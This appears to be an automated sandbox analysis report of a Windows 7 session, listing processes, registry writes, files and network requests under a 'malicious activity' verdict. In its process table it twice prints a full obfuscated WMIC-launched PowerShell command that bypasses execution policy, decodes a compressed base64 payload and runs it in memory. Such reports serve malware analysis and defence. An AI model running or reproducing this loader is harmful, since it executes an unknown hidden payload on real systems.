Field | Value |
---|---|
URL | http://www.google.com |
Full analysis | https://app.any.run/tasks/bc045738-edb7-4ed0-b9f2-761a04a4d35b |
Verdict | Malicious activity |
Analysis date | July 16, 2019, 23:01:12 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MD5 | ED646A3334CA891FD3467DB131372140 |
SHA1 | 738DDF35B3A85A7A6BA7B232BD3D5F1E4D284AD1 |
SHA256 | 253D142703041DD25197550A0FC11D6AC03BEFC1E64A1320009F1EDF400C39AD |
SSDEEP | 3:N1KJS4IK:Cc4IK |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3856 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://www.google.com" | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3600 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3856 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3576 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3492 | WmiC "prOcess" "CAlL" "CrEATe" "PoWersheLl -NoPRofiLE -EXECUTiONpoLI bYpAss -wiN 000000000000000000000000000000000000000000000000000000000000000001 -nOninT . ( $sHELlid[1]+$sHeLLiD[13]+'x')("\".('sl');&('sa'+'l') ('Ll') ('sa'+'l');&('lp');.('Ll') ('Pp') ('N'+'Ew-ObJ'+'ect');&('Ll') ('Pp'+'p') ('i'+'EX');&('Pp'+'p')(&('Pp') ('SysteM.i'+'O.co'+'mPRES'+'siOn'+'.'+'defLA'+'tESTrE'+'A'+'m')([IO.mEmORYsTReam][conVert]::FROmBaSe64stRing( ('PZlbi+'+'XGFYX/Sj9E9AxoQlWpLkE+b1FQHBkzWPMQMCYY4oDDYJ9kJnlJot+e9a0tG6an++hI'+'VbVva6299dXHlz//7WX/4fO77fvPP3zx1ceXP/3j5Z//+umvHz8u5YtvP3345suv9+/W9e8'+'/f/nTm5fX15dZ/9e656KftkyjrbmOZ65'+'tz73OrenPZc5tHLm3M7e+6fKur/W5XGPZWzpqmnLR'+'T09nTY+a1pzzQ4/MrZ+5LJvWPnX3oae0eNbXTauUTZ9nfX7mVJ/3iqeWa2nVMlrxqRUPlmt5ypnlHjrMrj/1o8P0NOfiZVZtM/mneedHzn1rnZVnm5L6kXPdcso6ka4ldlsu2'+'XJoCU52+jst29Jc05WXhUUfecm6i79t9VN3TE2LsU8ea+uzrjy03mWrmlxXyqmn5D6O5PUvPXlpf'+'Z7e89J2jFqWcG0eV+aovccyHKfLYUt7jLIOfUod900OQsOF'+'hc'+'XkwoUnpt7PXjkkz'+'8lvBYexpswcMueqQ07oOox2WcrTq9eyjYwL5VndnJodzvMKa276rQf1hEySC'+'bXI07hnYU123fFwzu'+'V'+'pp5TMvZO+033ptHuzzlF1T1lO25W0e9apU5lvN8mh/bC7utZO8gM+yHq25NnXuiK9KPhNiTKSLJ'+'bfEmeTF0jFkvau5fTYyAeLZh2GK4plz5NzbHl2nboq'+'GFW3pdt1/fDBG/Eoj65YtH4naJt0KezuXXEiZWRbk11leGn54+hDC+ZtKFMzTmzctY+kuJP12qMtW9e5O3e0nR2bTM157ZxeEVMMIofl0ULNcXB5pQ+8MXetQWUuckYjMdrkgLhSKANdd1YWnH1FarCv7u2qsoJz+zHS3MfR0x3VoQVkASVVFHRnjR4apPlYu87PcxjfMHbMQ3ZTOs1xVEEoTagD2d9KhISslp9H3l3SZEPCHkVc'+'xdaVJAvrLgCDkqQr9R6OX27kqf4GYth22SheyqLIwoSTlkd37gpfBpnIbwwkUx/OhqLrOKmkyJ6qDYkLAa5jBZv6Qk0qecpT3u19774n6qIKotLCIVe2yB0/7j5Y0eMjrU6+J'+'T/bs'+'vbKAaYAGbkFI/WN0mNzVAiedmNDx7XFObi1j7A2V6ek4Ar4Ub45c4VG+JMDNSFJzk8frOeDhFK8utzqMOFmPc9yRb'+'u18rwLRG5QHgAVifiDN1kbULA3ium+tsj4046yhQ3jTwKfiF2/vLB9IxsMkJimTVM5I2cVKSrT'+'mFs420E4KqnUlWk7iSC'+'8zt6n7k33DsVK9xlBesBqv8+Iixpny0E7'+'SX'+'+nQXET1sedrkC6kqRc3bgTGAA4VwNz8IWxj4pqM2doIC9PAzWq8oTTd'+'mdspsgvyjXL4gQiGg4eGJzKw2juPKRwQHY5IQOJhm0ljxIuKVYZ7iwwzCqG3Mj0wGryae6'+'ukK3J4mzvzTat9Qh9uVkJx1OYQ4nBthcgvIBs1GE32KS6Or8ysHrZCKP+kyOSt8RftWtoE7pz3
rY6V'+'YVPScmmQlY1yTHDcEtWzJGcyj1YscFk5REIk3fhgbay85WvvW4QUDFi4gvtWGTr6iru7TCy40mwxm7r9rfp3cVnkiXd5HUbp9prOAf+YlPZyB7J+XOhRyLxoJOqBagH/R6uEzY7LACarkE35BypwXJJYc1UAtCeAFdy/TQ6LwAH9FKn'+'O22uiDmVRPoo8VE+SQ6ALLNOqOgNsJkEFbnoY0IxWb1cEBlW'+'JzLd0LGZWkudXFzLgWhqUWONunX4yPkZBM7GWCMZlQC9ho3K20EOH34IHkeKELIU+MV5jDEkiolit69VuwPLqJsSKJUWGOhwiZdm4LE1nHVsoJwSt8E9ZUOtNds4OYzCGTLJCoskUdKWEuzRxBrjpnV83qN6ITgkBCxSZJq0jB8HKRYcOAdJYZ'+'cZ9'+'nJ5eZm2OSyQEEZQ'+'Wsn67iL6RemkKBs0FZHQHvD3TDFkik5fKt2N5t6/'+'E7iQJxXeRvk5QXUepBfZfaLnMujSSDmdrev2hlt0S4XT9Bi+RV3BKyMc5Nrjaz1WBC8Zen5QEBkDy5PqLzp4rSjauZkaN0ocfWSIkB05EezDuy4hyXTm0Gqg1BkQoxRNhjMgaAvAHw8kBaVKFVd+dKlHZghGIUpLzPEM4WEFrJiAjRitBfldiTJw8ODICRDZu32mI7aLs'+'wyf8rRyk9AQyiAGEtCsXoCaRf4tq8s5VJDMSTdxp9M+TxyNwxt'+'bL'+'2PQko+QiA1cWTkOfENpw++kUFZZCs67'+'WWuyCxBrLrIcsoC/oR'+'jAlkIEqaIO0DQhefKCXMNPEz2NnYDYkFwz2O1myurgPwOTDx+voYIRYoqjIUImWBHC6eW'+'wz4BkEN264TJVDuB3gJ'+'ghdOxCPAMktAhtI7QZZAqKTFZY4RHuK7QA2cTmaNBFVfhrchtTraE2e8oog1QAf5Y5mPUIoTMuSAIR1E4LUiSCke0yIVh8VSz8'+'JcNh/uneepJLdS0/kG/DOBv0WeiCsLJYMBA7DFKAzKaAx'+'ZjC7yk4jQqkJ3JLg6YVfnKr'+'1eiJrldyoDRUADuHRWm16J/kM5WQ'+'Swb+2e1op1dzukGhNA19CfoB+yq64XKVWrfTQEoZT22JngENJba0zmvuKE5DqnU1WNieI'+'IPCapuVaeYaWbQQyXK5x41UChNcIAAF+go'+'8RCOj6zo9r8GZBC7CA/vl4pfYEbFUc+BkcfOHX6eoTf'+'BnorBNmPlyWgqGiD0etyIAD5Ph2pKG2ncFPDv/NteBZLM7gTaT60l7JRhsC7RAMigRaLOpp246CdElVQA6Wi1Hz6l0bG7IDxQ+xxZ+QFnQGJlC7VlNcdcN8W4e8+EWFLwrp'+'6tl3J0NgQQjRvCGm/4ldBapab9kfIkeAhBXp/+gQFNEza0ibeag4b3cTTaa3d1w1BhDuFE7/Wi'+'CJLN'+'xfhj+3Rc6EVF8JVSAo4tCqDlatk4YLWcD6c'+'AV4ztip'+'imnFYBBfYGqZzdwrj5IoWQBueagmAkaHPS0yfRnqlVmCLk/SN'+'M'+'Bc'+'4TOsQZFGaNXaLL6ZUSAemiU0DlwXa6zW9iMF'+'pTSYMxCncC1Isi2WvFYaSy7ayCZpna'+'fDm3OwQm4'+'WsfuEE7mqOLUCNzJy'+'+pOjIaNssswJgLM6vFhfFpUaePq7qifRhGJWxIQFuYMRpC+O8cWUISoW/Jsnk9I7pioxOlqpcmxxCzjpMFuKFH39KdDq7BSxtYq'+'BUGiNLso22Rp+'+'XSDu5DkNXwNEjKmkl7'+'PBoQRQXcpM2Wwex8mOiRg2n8V'+'HrQ+RXj'+'IVocokmB73CKxDoSgZNz5TfYT4IP3RZCSh3Btb6ECKto'+'NFvVSa3dfR4q'+'iVva+uDFAyXGVkQSxHveUyXoGbUVu0RzXmEBl67HT2jeVGNFURdINpHk++jtICHkNQVJyK
v5E7+c26'+'GFwGvh2MjIN487Dj2TT84aay8vhMrEulCoC/9RnDwO9zBwUar8HBzCoRfguIKSVKstxs9bs+Zbq1YBIN4xK4zL5yulDvGf24sQVlXA6LIqSAoh98DNzTBLaedcs8+wSuarfiiadt/7Cme4/XEOSXhS+S2wOKKZ/'+'A'+'VnzTt4SyCyfBCnuDp1843YNGcAkaDUINkuwi1mq+'+'Xx2blsyMB8K'+'ik/GbvMqSqYyhq'+'MPqdFvWkd2BeEWOSjxEptqJzwN/tANq'+'dJd'+'rliJTK4xc0Mfw+sxwt2jlU4XeUv/Cj6oIJlZAMO6NAw/9OerWp'+'3utpr89p58aXauJh6jDZc93XpEq4cVBgamIqxOr'+'7Tiqqimw80no8vlZhnUHLhe3AKSIcw9'+'h1uy0zjISDptHvmY3zkOzEizv3pU4xFCPgJYR4gSsMqKlaa2HQGGOhY+HwbN5z1O2VwkDR95/HUYgjChLWFOZmqxe4g'+'mwdctzkKURVM1U9x4y3Aj+eNKWgNGS5jAWqJEdTKujR5m9+h/8Aa8Q3drDT91t1qz'+'fV5CgdG4pY18NQQhVherUEzp9IqzkZJCpF1hnLDZlsYQhF7gsu'+'RPMX5nevLLfAYi8NyH1tPTlSlyfzxizGfCmJyS'+'cEgVq8z'+'RRHmMfngCiAb1DNXOYqbiThEsgYMtbp9usaMFcOtxz5rmqJ4dJMjg'+'Bb5Tu8QEn74YvNjDXavHrkAnE87q2SEtrZBKaGOF6LnIM6rZzSH'+'uQKy4PTLpT1ai'+'lW58BBsBHLQ+BJKiZeo3G0JQHQx/W+QUHSMDtOgKjX/97gCAp0Q+08ORw1rD2BUSc7KP3G2BxuaHmJy4XYB9SrwbYBjQzavx'+'AiLle0SmLs2z0skfRXV8hAg9a0yBpx'+'yh4DK+mqBLxKSbsLF7YtBHvCahQ6UPouzpCfx9WvlIkBjaBGPT/GywOqcUpXR3/rtV/3JGiU92s6fT0pVuWmbH1iDOYC/t3OGBibS5UhT'+'uEtMxlx4eVprmPdecmBiCXahm'+'qJExeO6RH8AOghBe8XiffPHwaw51PXsAJaFnBcFTrkiGoZPPUtyaOtPGfUSIJSZAT8qHLLMweBiA+ukc9gipu1Pp5qmHl3LT3XcH2RMHpqtXuHV3IdF/M8kAbtBoWdgLXWKZ2h1EteegZ3RUHNWvtI5QAGAfR152T7ktCLcYVvBSCl15WustxvEMWQpBPMmYPKZigOChHX3JEa9lKs0Qwxxr'+'TbByDYS/PGSwrvSiR0gZT5IOD2aqT'+'3nrWAZhZIffB/lt3SNa8BgGA2ZM2nO47Gq3qkaf4jTLHKJ5ACjAjKEq3vJYTBb04uI'+'xLhAnyefAEhCPpoK4/SbI2n+15s5mqHg5kD3/tn6mk+yGSvSJZ6c'+'MQo14'+'u4dHQI0W6C51vEnu6wFOi+'+'axJLznux61merQABvl5CRjqAutjJhUoN1tKG9D6G939yFUPlhMO1V6zD3ghighaJRBpcPpN6FPRBLzOhPuMdo02qYuq6mLrKvfYAZMP2gS4jXuZH4rKV5LJl7EUsV8'+'l6MhUZq5I+fpcd23P/xWzTlzvxf16GDcr214+0nXQwuvslvaKcZzX0Gv6XfIcQf'+'wH6IrXr'+'T5Heyy'+'Nhki6VanCnEsMWLh'+'eyeietV+3c1ztFvmd1A1zw'+'4sjd'+'7SVkEBTAukc8Tq0QdO0OprTSt79GBiijzZ/bGZhy1tdpEJDQXOVT0'+'LQeEGoBofpNd35/uvfvzwOr+++/T+o/7YX1/efXp+/PHz66bvnnw36dKpS'+'x9eXh9x2+eX1/PX+56/fP16ce39xy8/vx5c83rr68t/p/+8vHn59vc///TvP3zz4bt1/fzzj19/yP3Nm5ff/OW3'+'H37+9OGbH7/e37x9+zL/7u277z/p1j9+/'+'813b
//39uXty3/fP5//Bw==') ) "\" + [StrinG][Char]44 +"\"[iO.CoMPressiOn.ComPreSSiONmODe]::DeCoMpreSS)|.('%') {.('Pp') ('SY'+'st'+'Em.Io.stRe'+'AmreAd'+'er')(`${_}"\" + [StrinG][Char]44 +"\" [TExT.eNCOdinG]::ASciI)} ).reADtoEnD()"\" )" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3460 | PoWersheLl -NoPRofiLE -EXECUTiONpoLI bYpAss -wiN 000000000000000000000000000000000000000000000000000000000000000001 -nOninT . ( $sHELlid[1]+$sHeLLiD[13]+'x')("\".('sl');&('sa'+'l') ('Ll') ('sa'+'l');&('lp');.('Ll') ('Pp') ('N'+'Ew-ObJ'+'ect');&('Ll') ('Pp'+'p') ('i'+'EX');&('Pp'+'p')(&('Pp') ('SysteM.i'+'O.co'+'mPRES'+'siOn'+'.'+'defLA'+'tESTrE'+'A'+'m')([IO.mEmORYsTReam][conVert]::FROmBaSe64stRing( ('PZlbi+'+'XGFYX/Sj9E9AxoQlWpLkE+b1FQHBkzWPMQMCYY4oDDYJ9kJnlJot+e9a0tG6an++hI'+'VbVva6299dXHlz//7WX/4fO77fvPP3zx1ceXP/3j5Z//+umvHz8u5YtvP3345suv9+/W9e8'+'/f/nTm5fX15dZ/9e656KftkyjrbmOZ65'+'tz73OrenPZc5tHLm3M7e+6fKur/W5XGPZWzpqmnLR'+'T09nTY+a1pzzQ4/MrZ+5LJvWPnX3oae0eNbXTauUTZ9nfX7mVJ/3iqeWa2nVMlrxqRUPlmt5ypnlHjrMrj/1o8P0NOfiZVZtM/mneedHzn1rnZVnm5L6kXPdcso6ka4ldlsu2'+'XJoCU52+jst29Jc05WXhUUfecm6i79t9VN3TE2LsU8ea+uzrjy03mWrmlxXyqmn5D6O5PUvPXlpf'+'Z7e89J2jFqWcG0eV+aovccyHKfLYUt7jLIOfUod900OQsOF'+'hc'+'XkwoUnpt7PXjkkz'+'8lvBYexpswcMueqQ07oOox2WcrTq9eyjYwL5VndnJodzvMKa276rQf1hEySC'+'bXI07hnYU123fFwzu'+'V'+'pp5TMvZO+033ptHuzzlF1T1lO25W0e9apU5lvN8mh/bC7utZO8gM+yHq25NnXuiK9KPhNiTKSLJ'+'bfEmeTF0jFkvau5fTYyAeLZh2GK4plz5NzbHl2nboq'+'GFW3pdt1/fDBG/Eoj65YtH4naJt0KezuXXEiZWRbk11leGn54+hDC+ZtKFMzTmzctY+kuJP12qMtW9e5O3e0nR2bTM157ZxeEVMMIofl0ULNcXB5pQ+8MXetQWUuckYjMdrkgLhSKANdd1YWnH1FarCv7u2qsoJz+zHS3MfR0x3VoQVkASVVFHRnjR4apPlYu87PcxjfMHbMQ3ZTOs1xVEEoTagD2d9KhISslp9H3l3SZEPCHkVc'+'xdaVJAvrLgCDkqQr9R6OX27kqf4GYth22SheyqLIwoSTlkd37gpfBpnIbwwkUx/OhqLrOKmkyJ6qDYkLAa5jBZv6Qk0qecpT3u19774n6qIKotLCIVe2yB0/7j5Y0eMjrU6+J'+'T/bs'+'vbKAaYAGbkFI/WN0mNzVAiedmNDx7XFObi1j7A2V6ek4Ar4Ub45c4VG+JMDNSFJzk8frOeDhFK8utzqMOFmPc9yRb'+'u18rwLRG5QHgAVifiDN1kbULA3ium+tsj4046yhQ3jTwKfiF2/vLB9IxsMkJimTVM5I2cVKSrT'+'mFs420E4KqnUlWk7iSC'+'8zt6n7k33DsVK9xlBesBqv8+Iixpny0E7'+'SX'+'+nQXET1sedrkC6kqRc3bgTGAA4VwNz8IWxj4pqM2doIC9PAzWq8oTTd'+'mdspsgvyjXL4gQiGg4eGJzKw2juPKRwQHY5IQOJhm0ljxIuKVYZ7iwwzCqG3Mj0wGryae6'+'ukK3J4mzvzTat9Qh9uVkJx1OYQ4nBthcgvIBs1GE32KS6Or8ysHrZCKP+kyOSt8RftWtoE7pz3rY6V'+'YVPScmmQlY1yTHDcEtWzJGcyj
1YscFk5REIk3fhgbay85WvvW4QUDFi4gvtWGTr6iru7TCy40mwxm7r9rfp3cVnkiXd5HUbp9prOAf+YlPZyB7J+XOhRyLxoJOqBagH/R6uEzY7LACarkE35BypwXJJYc1UAtCeAFdy/TQ6LwAH9FKn'+'O22uiDmVRPoo8VE+SQ6ALLNOqOgNsJkEFbnoY0IxWb1cEBlW'+'JzLd0LGZWkudXFzLgWhqUWONunX4yPkZBM7GWCMZlQC9ho3K20EOH34IHkeKELIU+MV5jDEkiolit69VuwPLqJsSKJUWGOhwiZdm4LE1nHVsoJwSt8E9ZUOtNds4OYzCGTLJCoskUdKWEuzRxBrjpnV83qN6ITgkBCxSZJq0jB8HKRYcOAdJYZ'+'cZ9'+'nJ5eZm2OSyQEEZQ'+'Wsn67iL6RemkKBs0FZHQHvD3TDFkik5fKt2N5t6/'+'E7iQJxXeRvk5QXUepBfZfaLnMujSSDmdrev2hlt0S4XT9Bi+RV3BKyMc5Nrjaz1WBC8Zen5QEBkDy5PqLzp4rSjauZkaN0ocfWSIkB05EezDuy4hyXTm0Gqg1BkQoxRNhjMgaAvAHw8kBaVKFVd+dKlHZghGIUpLzPEM4WEFrJiAjRitBfldiTJw8ODICRDZu32mI7aLs'+'wyf8rRyk9AQyiAGEtCsXoCaRf4tq8s5VJDMSTdxp9M+TxyNwxt'+'bL'+'2PQko+QiA1cWTkOfENpw++kUFZZCs67'+'WWuyCxBrLrIcsoC/oR'+'jAlkIEqaIO0DQhefKCXMNPEz2NnYDYkFwz2O1myurgPwOTDx+voYIRYoqjIUImWBHC6eW'+'wz4BkEN264TJVDuB3gJ'+'ghdOxCPAMktAhtI7QZZAqKTFZY4RHuK7QA2cTmaNBFVfhrchtTraE2e8oog1QAf5Y5mPUIoTMuSAIR1E4LUiSCke0yIVh8VSz8'+'JcNh/uneepJLdS0/kG/DOBv0WeiCsLJYMBA7DFKAzKaAx'+'ZjC7yk4jQqkJ3JLg6YVfnKr'+'1eiJrldyoDRUADuHRWm16J/kM5WQ'+'Swb+2e1op1dzukGhNA19CfoB+yq64XKVWrfTQEoZT22JngENJba0zmvuKE5DqnU1WNieI'+'IPCapuVaeYaWbQQyXK5x41UChNcIAAF+go'+'8RCOj6zo9r8GZBC7CA/vl4pfYEbFUc+BkcfOHX6eoTf'+'BnorBNmPlyWgqGiD0etyIAD5Ph2pKG2ncFPDv/NteBZLM7gTaT60l7JRhsC7RAMigRaLOpp246CdElVQA6Wi1Hz6l0bG7IDxQ+xxZ+QFnQGJlC7VlNcdcN8W4e8+EWFLwrp'+'6tl3J0NgQQjRvCGm/4ldBapab9kfIkeAhBXp/+gQFNEza0ibeag4b3cTTaa3d1w1BhDuFE7/Wi'+'CJLN'+'xfhj+3Rc6EVF8JVSAo4tCqDlatk4YLWcD6c'+'AV4ztip'+'imnFYBBfYGqZzdwrj5IoWQBueagmAkaHPS0yfRnqlVmCLk/SN'+'M'+'Bc'+'4TOsQZFGaNXaLL6ZUSAemiU0DlwXa6zW9iMF'+'pTSYMxCncC1Isi2WvFYaSy7ayCZpna'+'fDm3OwQm4'+'WsfuEE7mqOLUCNzJy'+'+pOjIaNssswJgLM6vFhfFpUaePq7qifRhGJWxIQFuYMRpC+O8cWUISoW/Jsnk9I7pioxOlqpcmxxCzjpMFuKFH39KdDq7BSxtYq'+'BUGiNLso22Rp+'+'XSDu5DkNXwNEjKmkl7'+'PBoQRQXcpM2Wwex8mOiRg2n8V'+'HrQ+RXj'+'IVocokmB73CKxDoSgZNz5TfYT4IP3RZCSh3Btb6ECKto'+'NFvVSa3dfR4q'+'iVva+uDFAyXGVkQSxHveUyXoGbUVu0RzXmEBl67HT2jeVGNFURdINpHk++jtICHkNQVJyKv5E7+c26'+'GFwGvh2MjIN487Dj2TT84
aay8vhMrEulCoC/9RnDwO9zBwUar8HBzCoRfguIKSVKstxs9bs+Zbq1YBIN4xK4zL5yulDvGf24sQVlXA6LIqSAoh98DNzTBLaedcs8+wSuarfiiadt/7Cme4/XEOSXhS+S2wOKKZ/'+'A'+'VnzTt4SyCyfBCnuDp1843YNGcAkaDUINkuwi1mq+'+'Xx2blsyMB8K'+'ik/GbvMqSqYyhq'+'MPqdFvWkd2BeEWOSjxEptqJzwN/tANq'+'dJd'+'rliJTK4xc0Mfw+sxwt2jlU4XeUv/Cj6oIJlZAMO6NAw/9OerWp'+'3utpr89p58aXauJh6jDZc93XpEq4cVBgamIqxOr'+'7Tiqqimw80no8vlZhnUHLhe3AKSIcw9'+'h1uy0zjISDptHvmY3zkOzEizv3pU4xFCPgJYR4gSsMqKlaa2HQGGOhY+HwbN5z1O2VwkDR95/HUYgjChLWFOZmqxe4g'+'mwdctzkKURVM1U9x4y3Aj+eNKWgNGS5jAWqJEdTKujR5m9+h/8Aa8Q3drDT91t1qz'+'fV5CgdG4pY18NQQhVherUEzp9IqzkZJCpF1hnLDZlsYQhF7gsu'+'RPMX5nevLLfAYi8NyH1tPTlSlyfzxizGfCmJyS'+'cEgVq8z'+'RRHmMfngCiAb1DNXOYqbiThEsgYMtbp9usaMFcOtxz5rmqJ4dJMjg'+'Bb5Tu8QEn74YvNjDXavHrkAnE87q2SEtrZBKaGOF6LnIM6rZzSH'+'uQKy4PTLpT1ai'+'lW58BBsBHLQ+BJKiZeo3G0JQHQx/W+QUHSMDtOgKjX/97gCAp0Q+08ORw1rD2BUSc7KP3G2BxuaHmJy4XYB9SrwbYBjQzavx'+'AiLle0SmLs2z0skfRXV8hAg9a0yBpx'+'yh4DK+mqBLxKSbsLF7YtBHvCahQ6UPouzpCfx9WvlIkBjaBGPT/GywOqcUpXR3/rtV/3JGiU92s6fT0pVuWmbH1iDOYC/t3OGBibS5UhT'+'uEtMxlx4eVprmPdecmBiCXahm'+'qJExeO6RH8AOghBe8XiffPHwaw51PXsAJaFnBcFTrkiGoZPPUtyaOtPGfUSIJSZAT8qHLLMweBiA+ukc9gipu1Pp5qmHl3LT3XcH2RMHpqtXuHV3IdF/M8kAbtBoWdgLXWKZ2h1EteegZ3RUHNWvtI5QAGAfR152T7ktCLcYVvBSCl15WustxvEMWQpBPMmYPKZigOChHX3JEa9lKs0Qwxxr'+'TbByDYS/PGSwrvSiR0gZT5IOD2aqT'+'3nrWAZhZIffB/lt3SNa8BgGA2ZM2nO47Gq3qkaf4jTLHKJ5ACjAjKEq3vJYTBb04uI'+'xLhAnyefAEhCPpoK4/SbI2n+15s5mqHg5kD3/tn6mk+yGSvSJZ6c'+'MQo14'+'u4dHQI0W6C51vEnu6wFOi+'+'axJLznux61merQABvl5CRjqAutjJhUoN1tKG9D6G939yFUPlhMO1V6zD3ghighaJRBpcPpN6FPRBLzOhPuMdo02qYuq6mLrKvfYAZMP2gS4jXuZH4rKV5LJl7EUsV8'+'l6MhUZq5I+fpcd23P/xWzTlzvxf16GDcr214+0nXQwuvslvaKcZzX0Gv6XfIcQf'+'wH6IrXr'+'T5Heyy'+'Nhki6VanCnEsMWLh'+'eyeietV+3c1ztFvmd1A1zw'+'4sjd'+'7SVkEBTAukc8Tq0QdO0OprTSt79GBiijzZ/bGZhy1tdpEJDQXOVT0'+'LQeEGoBofpNd35/uvfvzwOr+++/T+o/7YX1/efXp+/PHz66bvnnw36dKpS'+'x9eXh9x2+eX1/PX+56/fP16ce39xy8/vx5c83rr68t/p/+8vHn59vc///TvP3zz4bt1/fzzj19/yP3Nm5ff/OW3'+'H37+9OGbH7/e37x9+zL/7u277z/p1j9+/'+'813b//39uXty3/fP5//Bw==') ) "\" + 
[StrinG][Char]44 +"\"[iO.CoMPressiOn.ComPreSSiONmODe]::DeCoMpreSS)|.('%') {.('Pp') ('SY'+'st'+'Em.Io.stRe'+'AmreAd'+'er')(`${_}"\" + [StrinG][Char]44 +"\" [TExT.eNCOdinG]::ASciI)} ).reADtoEnD()"\" ) | C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
692 | "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe" | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell ISE Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3344 | C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe | C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe | — | services.exe |
User: LOCAL SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: PresentationFontCache.exe Version: 3.0.6920.4902 built by: NetFXw7 | ||||
PID | Process | Operation | Key | Name | Value |
---|---|---|---|---|---|
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | CompatibilityFlags | 0 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | SecuritySafe | 1 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active | {A3E802C3-A81D-11E9-95C0-5254004A04AF} | 0 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore | Type | 4 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore | Count | 2 |
3856 | iexplore.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore | Time | E307070002001000170001001C009D00 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3600 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[1].txt | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | — |
3600 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\8BW8CI0Y\google_com[1].txt | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF25B0F3102B6CDC62.TMP | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFBE99782AD7E29393.TMP | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFF5036D50E222C273.TMP | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF66FBDD06CB25E5DD.TMP | — | — | — |
3856 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{A3E802C3-A81D-11E9-95C0-5254004A04AF}.dat | — | — | — |
3460 | PoWersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H3PB3QUVWAVJ9PETYRTH.temp | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3600 | iexplore.exe | GET | 302 | 172.217.23.164:80 | http://www.google.com/ | US | html | 231 b | whitelisted |
3856 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
